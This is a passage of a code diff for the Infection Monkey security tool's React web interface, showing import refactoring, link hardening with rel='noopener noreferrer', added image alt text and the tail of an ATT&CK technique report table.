+              id: 'machine',
+              accessor: x => renderMachineFromSystemData(x.machine),
+              style: {'whiteSpace': 'unset'}},
+            { Header: 'Result',
+              id: 'result',
+              accessor: x => x.result,
+              style: {'whiteSpace': 'unset'}}
+          ]
+      }])
+  }
+
+  render() {
+    return (
+      <div>
+        <div>{this.props.data.message}</div>
+        <br/>
+        {this.props.data.status === ScanStatus.USED ?
+          <ReactTable
+            columns={T1136.getColumns()}
+            data={this.props.data.info}
+            showPagination={false}
+            defaultPageSize={this.props.data.info.length}
+          /> : ''}
+      </div>
+    );
+  }
+}
+
+export default T1136;

monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js

@@ -1,6 +1,6 @@
 import React from 'react';
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
-import { faHandPointLeft } from '@fortawesome/free-solid-svg-icons'
+import { faHandPointLeft } from '@fortawesome/free-solid-svg-icons/faHandPointLeft'
 import Toggle from 'react-toggle';
 import {OverlayTrigger, Tooltip} from 'react-bootstrap';
 import download from 'downloadjs'

monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js

@@ -346,8 +346,8 @@ class ConfigurePageComponent extends AuthComponent {
             throw Error()
           }
           return res;
-        }).catch(error => {
+        }).catch((error) => {
-        console.log('bad configuration');
+        console.log(`bad configuration ${error}`);
         this.setState({lastAction: 'invalid_configuration'});
       }));
   }

monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js

@@ -21,10 +21,10 @@ class LicensePageComponent extends React.Component {
           <p>
             Copyright <i className="glyphicon glyphicon-copyright-mark"/> {rainge(2015)} Guardicore Ltd.
             <br/>
-            Licensed under <a href="https://www.gnu.org/licenses/gpl-3.0.html" target="_blank">GPLv3</a>.
+            Licensed under <a href="https://www.gnu.org/licenses/gpl-3.0.html" rel="noopener noreferrer" target="_blank">GPLv3</a>.
           </p>
           <p>
-            The source code is available on <a href="https://github.com/guardicore/monkey" target="_blank">GitHub</a>
+            The source code is available on <a href="https://github.com/guardicore/monkey" rel="noopener noreferrer" target="_blank">GitHub</a>
           </p>
         </div>
       </Col>

monkey/monkey_island/cc/ui/src/components/pages/MapPage.js

@@ -2,7 +2,8 @@ import React from 'react';
 import {Col, Modal} from 'react-bootstrap';
 import {Link} from 'react-router-dom';
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
-import { faStopCircle, faMinus } from '@fortawesome/free-solid-svg-icons'
+import { faStopCircle } from '@fortawesome/free-solid-svg-icons/faStopCircle'
+import { faMinus } from '@fortawesome/free-solid-svg-icons/faMinus'
 import PreviewPaneComponent from 'components/map/preview-pane/PreviewPane';
 import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
 import {getOptions, edgeGroupToColor} from 'components/map/MapOptions';

monkey/monkey_island/cc/ui/src/components/pages/NotFoundPage.js

@@ -2,7 +2,7 @@ import React from 'react';
 
 import '../../styles/NotFoundPage.scss';
 
-let monkeyDetective = require('../../images/detective-monkey.svg');
+import monkeyDetective from '../../images/detective-monkey.svg';
 
 class ConfigurePageComponent extends React.Component{
   constructor(props) {
@@ -12,7 +12,7 @@ class ConfigurePageComponent extends React.Component{
   render(){
     return(
       <div className={'not-found'}>
-        <img className={'monkey-detective'} src={monkeyDetective}/>
+        <img alt="404 monkey image" className={'monkey-detective'} src={monkeyDetective}/>
         <div className={'text-block'}>
           <h1 className={'not-found-title'}>404</h1>
           <h2 className={'not-found-subtitle'}>Page not found</h2>

monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js

@@ -5,12 +5,16 @@ import CopyToClipboard from 'react-copy-to-clipboard';
 import GridLoader from 'react-spinners/GridLoader';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faClipboard, faCheck, faSync } from '@fortawesome/free-solid-svg-icons';
+import { faClipboard } from '@fortawesome/free-solid-svg-icons/faClipboard';
+import { faCheck } from '@fortawesome/free-solid-svg-icons/faCheck';
+import { faSync } from '@fortawesome/free-solid-svg-icons/faSync';
 
 import {Link} from 'react-router-dom';
 import AuthComponent from '../AuthComponent';
 import AwsRunTable from '../run-monkey/AwsRunTable';
 
+import '../../styles/MonkeyRunPage.scss';
+
 const loading_css_override = css`
     display: block;
     margin-right: auto;
@@ -252,7 +256,7 @@ class RunMonkeyPageComponent extends AuthComponent {
             <i className="glyphicon glyphicon-info-sign" style={{'marginRight': '5px'}}/>
             Not sure what this is? Not seeing your AWS EC2 instances? <a
             href="https://github.com/guardicore/monkey/wiki/Monkey-Island:-Running-the-monkey-on-AWS-EC2-instances"
-            target="_blank">Read the documentation</a>!
+            rel="noopener noreferrer" target="_blank">Read the documentation</a>!
           </p>
         </div>
         {
@@ -325,7 +329,8 @@ class RunMonkeyPageComponent extends AuthComponent {
               Choose the operating system where you want to run the monkey
               {this.state.ips.length > 1 ? ', and the interface to communicate with.' : '.'}
             </p>
-            <Nav bsStyle="pills" justified activeKey={this.state.selectedOs} onSelect={this.setSelectedOs}>
+            <Nav bsStyle='pills' id={'bootstrap-override'} className={'runOnOsButtons'}
+                 justified activeKey={this.state.selectedOs} onSelect={this.setSelectedOs}>
               <NavItem key='windows-32' eventKey='windows-32'>Windows (32 bit)</NavItem>
               <NavItem key='windows-64' eventKey='windows-64'>Windows (64 bit)</NavItem>
               <NavItem key='linux-32' eventKey='linux-32'>Linux (32 bit)</NavItem>

monkey/monkey_island/cc/ui/src/components/pages/RunServerPage.js

@@ -22,7 +22,7 @@ class RunServerPageComponent extends React.Component {
           </p>
           <p>
             To read more about the Monkey, visit <a href="http://infectionmonkey.com"
-                                                    target="_blank">infectionmonkey.com</a>
+                                                    rel="noopener noreferrer" target="_blank">infectionmonkey.com</a>
           </p>
           <p>
             Go ahead and <Link to="/run-monkey">run the monkey</Link>.

monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js

@@ -3,7 +3,10 @@ import {Col, Button} from 'react-bootstrap';
 import '../../styles/Collapse.scss';
 import '../../styles/report/AttackReport.scss';
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import {faCircle, faEye, faEyeSlash, faRadiation} from '@fortawesome/free-solid-svg-icons';
+import {faCircle} from '@fortawesome/free-solid-svg-icons/faCircle';
+import {faRadiation} from '@fortawesome/free-solid-svg-icons/faRadiation';
+import {faEye} from '@fortawesome/free-solid-svg-icons/faEye';
+import {faEyeSlash} from '@fortawesome/free-solid-svg-icons/faEyeSlash';
 
 import ReportHeader, {ReportTypes} from './common/ReportHeader';
 import {ScanStatus} from '../attack/techniques/Helpers';

monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js

@@ -16,9 +16,8 @@ import SecurityIssuesGlance from './common/SecurityIssuesGlance';
 import PrintReportButton from './common/PrintReportButton';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faMinus } from '@fortawesome/free-solid-svg-icons';
+import { faMinus } from '@fortawesome/free-solid-svg-icons/faMinus';
-
+import guardicoreLogoImage from '../../images/guardicore-logo.png'
-let guardicoreLogoImage = require('../../images/guardicore-logo.png');
 
 
 class ReportPageComponent extends AuthComponent {

monkey/monkey_island/cc/ui/src/components/report-components/attack/ReportMatrixComponent.js

@@ -20,7 +20,7 @@ class ReportMatrixComponent extends React.Component {
       }
       let tech_type = this.state.schema.properties[type_key];
       columns.push({
-        Header: () => (<a href={tech_type.link} target="_blank">{tech_type.title}</a>),
+        Header: () => (<a href={tech_type.link} rel="noopener noreferrer" target="_blank">{tech_type.title}</a>),
         id: type_key,
         accessor: x => this.renderTechnique(x[tech_type.title]),
         style: {'whiteSpace': 'unset'}

monkey/monkey_island/cc/ui/src/components/report-components/attack/SelectedTechnique.js

@@ -3,9 +3,9 @@ import Collapse from '@kunukn/react-collapse';
 
 import AttackReport from '../AttackReport';
 import {FontAwesomeIcon} from '@fortawesome/react-fontawesome';
-import {faQuestionCircle} from '@fortawesome/free-solid-svg-icons';
+import {faQuestionCircle} from '@fortawesome/free-solid-svg-icons/faQuestionCircle';
 
-const classNames = require('classnames');
+import classNames from 'classnames';
 
 class SelectedTechnique extends React.Component {
 
@@ -37,7 +37,7 @@ class SelectedTechnique extends React.Component {
             {this.state.techniques[tech_id].title}
           </span>
           <span>
-            <a href={this.state.techniques[tech_id].link} target='_blank' className={'link-to-technique'}>
+            <a href={this.state.techniques[tech_id].link} rel="noopener noreferrer" target='_blank' className={'link-to-technique'}>
               <FontAwesomeIcon icon={faQuestionCircle}/>
             </a>
           </span>

monkey/monkey_island/cc/ui/src/components/report-components/attack/TechniqueDropdowns.js

@@ -1,12 +1,15 @@
 import React from 'react';
 import Collapse from '@kunukn/react-collapse';
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
-import { faQuestionCircle, faChevronUp, faChevronDown, faToggleOn } from '@fortawesome/free-solid-svg-icons'
+import { faQuestionCircle } from '@fortawesome/free-solid-svg-icons/faQuestionCircle'
+import { faChevronUp } from '@fortawesome/free-solid-svg-icons/faChevronUp'
+import { faChevronDown } from '@fortawesome/free-solid-svg-icons/faChevronDown'
+import { faToggleOn } from '@fortawesome/free-solid-svg-icons/faToggleON'
 
 import {Button} from 'react-bootstrap';
 import AttackReport from '../AttackReport';
 
-const classNames = require('classnames');
+import classNames from 'classnames';
 
 class TechniqueDropdowns extends React.Component{
 
@@ -40,7 +43,7 @@ class TechniqueDropdowns extends React.Component{
             {this.state.techniques[tech_id].title}
           </span>
           <span>
-            <a href={this.state.techniques[tech_id].link} target='_blank' className={'link-to-technique'}>
+            <a href={this.state.techniques[tech_id].link} rel="noopener noreferrer" target='_blank' className={'link-to-technique'}>
               <FontAwesomeIcon icon={faQuestionCircle}/>
             </a>
               <FontAwesomeIcon icon={this.state.collapseOpen === tech_id ? faChevronDown : faChevronUp}/>

monkey/monkey_island/cc/ui/src/components/report-components/common/ReportHeader.js

@@ -2,7 +2,7 @@ import React, {Component} from 'react';
 import {Col} from 'react-bootstrap';
 import * as PropTypes from 'prop-types';
 
-let monkeyLogoImage = require('../../../images/monkey-icon.svg');
+import monkeyLogoImage from '../../../images/monkey-icon.svg';
 
 export const ReportTypes = {
   zeroTrust: 'Zero Trust',
@@ -29,7 +29,7 @@ export class ReportHeader extends Component {
         </div>
       </Col>
       <Col xs={4}>
-        <img src={monkeyLogoImage}
+        <img alt="monkey logo image" src={monkeyLogoImage}
              style={{
                float: 'right',
                width: '80px'

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js

@@ -4,7 +4,7 @@ import {Badge, Button} from 'react-bootstrap';
 import * as PropTypes from 'prop-types';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faList } from '@fortawesome/free-solid-svg-icons';
+import { faList } from '@fortawesome/free-solid-svg-icons/faList';
 
 export default class EventsButton extends Component {
   constructor(props) {

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js

@@ -1,11 +1,10 @@
 import React, {Component} from 'react';
-import {Badge, Modal} from 'react-bootstrap';
+import {Modal} from 'react-bootstrap';
 import EventsTimeline from './EventsTimeline';
 import * as PropTypes from 'prop-types';
 import saveJsonToFile from '../../utils/SaveJsonToFile';
 import EventsModalButtons from './EventsModalButtons';
 import Pluralize from 'pluralize'
-import {statusToLabelType} from './StatusLabel';
 
 export default class EventsModal extends Component {
   constructor(props) {

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js

@@ -2,8 +2,8 @@ import React, {Component} from 'react';
 import {Timeline, TimelineEvent} from 'react-event-timeline';
 import * as PropTypes from 'prop-types';
 
-let monkeyLocalIcon = require('../../../images/zerotrust/im-alert-machine-icon.svg');
+import monkeyLocalIcon from '../../../images/zerotrust/im-alert-machine-icon.svg';
-let monkeyNetworkIcon = require('../../../images/zerotrust/im-alert-network-icon.svg');
+import monkeyNetworkIcon from '../../../images/zerotrust/im-alert-network-icon.svg';
 
 const eventTypeToIcon = {
   'monkey_local': monkeyLocalIcon,

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ExportEventsButton.js

@@ -3,7 +3,7 @@ import {Button} from 'react-bootstrap';
 import * as PropTypes from 'prop-types';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faDownload } from '@fortawesome/free-solid-svg-icons';
+import { faDownload } from '@fortawesome/free-solid-svg-icons/faDownload';
 
 export default class ExportEventsButton extends Component {
   render() {

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/FindingsSection.js

@@ -1,7 +1,5 @@
-import React, {Component, Fragment} from 'react';
+import React, {Component} from 'react';
-import PillarLabel from './PillarLabel';
+import {ZeroTrustStatuses} from './ZeroTrustPillars';
-import EventsButton from './EventsButton';
-import ZeroTrustPillars, {ZeroTrustStatuses} from './ZeroTrustPillars';
 import {FindingsTable} from './FindingsTable';
 
 

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js

@@ -3,7 +3,13 @@ import {statusToLabelType} from './StatusLabel';
 import * as PropTypes from 'prop-types';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faDatabase, faUser, faWifi, faCloud, faLaptop, faEyeSlash, faCogs } from '@fortawesome/free-solid-svg-icons';
+import { faDatabase } from '@fortawesome/free-solid-svg-icons/faDatabase';
+import { faUser  } from '@fortawesome/free-solid-svg-icons/faUser';
+import { faWifi } from '@fortawesome/free-solid-svg-icons/faWifi';
+import { faCloud } from '@fortawesome/free-solid-svg-icons/faCloud';
+import { faLaptop } from '@fortawesome/free-solid-svg-icons/faLaptop';
+import { faEyeSlash } from '@fortawesome/free-solid-svg-icons/faEyeSlash';
+import { faCogs } from '@fortawesome/free-solid-svg-icons/faCogs';
 
 const pillarToIcon = {
   'Data': faDatabase,

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js

@@ -5,7 +5,7 @@ import {NavLink} from 'react-router-dom';
 import {Panel} from 'react-bootstrap';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faChevronDown } from '@fortawesome/free-solid-svg-icons';
+import { faChevronDown } from '@fortawesome/free-solid-svg-icons/faChevronDown';
 
 
 class ZeroTrustReportLegend extends Component {

monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusLabel.js

@@ -2,7 +2,10 @@ import React, {Component} from 'react';
 import * as PropTypes from 'prop-types';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faCheck, faExclamationTriangle, faBomb, faQuestion } from '@fortawesome/free-solid-svg-icons';
+import { faCheck } from '@fortawesome/free-solid-svg-icons/faCheck';
+import { faExclamationTriangle } from '@fortawesome/free-solid-svg-icons/faExclamationTriangle';
+import { faBomb } from '@fortawesome/free-solid-svg-icons/faBomb';
+import { faQuestion } from '@fortawesome/free-solid-svg-icons/faQuestion';
 
 const statusToIcon = {
   'Passed': faCheck,

monkey/monkey_island/cc/ui/src/components/side-menu/VersionComponent.js

@@ -1,7 +1,7 @@
 import React from 'react';
 
 import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
-import { faDownload } from '@fortawesome/free-solid-svg-icons';
+import { faDownload } from '@fortawesome/free-solid-svg-icons/faDownload';
 
 class VersionComponent extends React.Component {
   constructor(props) {
@@ -34,7 +34,7 @@ class VersionComponent extends React.Component {
             <div>
               <b>Newer version available!</b>
               <br/>
-              <b><a target="_blank" href={this.state.downloadLink}>Download here <FontAwesomeIcon icon={faDownload}/></a></b>
+              <b><a rel="noopener noreferrer" target="_blank" href={this.state.downloadLink}>Download here <FontAwesomeIcon icon={faDownload}/></a></b>
             </div>
             :
             undefined

monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js

@@ -83,7 +83,7 @@ class CheckboxComponent extends React.PureComponent {
                type='checkbox' value={this.state.checked}
                name={this.props.name}/>
         <label className='text'>{this.props.children}</label>
-        <div className='ui-btn-ping' onTransitionEnd={this.stopAnimation}></div>
+        <div className='ui-btn-ping' onTransitionEnd={this.stopAnimation}/>
       </div>
     )
   }